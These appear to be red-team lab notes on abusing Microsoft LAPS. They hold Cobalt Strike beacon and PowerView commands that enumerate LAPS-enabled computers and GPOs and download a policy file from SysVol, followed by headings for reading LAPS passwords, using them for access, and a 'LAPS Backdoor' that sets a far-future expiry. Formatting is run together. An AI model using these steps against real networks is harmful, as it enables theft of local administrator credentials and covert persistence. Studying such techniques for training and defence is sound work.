LAPS
LAPS
Check for presence of LAPS
LAPS client installed on local machine
beacon> ls C:\Program Files\LAPS\CSEComputer Object having ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime attribute set
powerpick Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostNameLAPS configuration deplayed through GPO
beacon> powerpick Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | flDownload LAPS configuration
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.polParse the LAPS GPO Policy file downloaded in previous step
Identify the principals who have read right to LAPS password
Use Laps Toolkit to identify Groups & Users who can read LAPS password
View the LAPS password for given machine (From User Session having required rights)
Use the laps password to gain access
Set Far Future date as expiry (Only machine can set its Password)
LAPS Backdoor
Last updated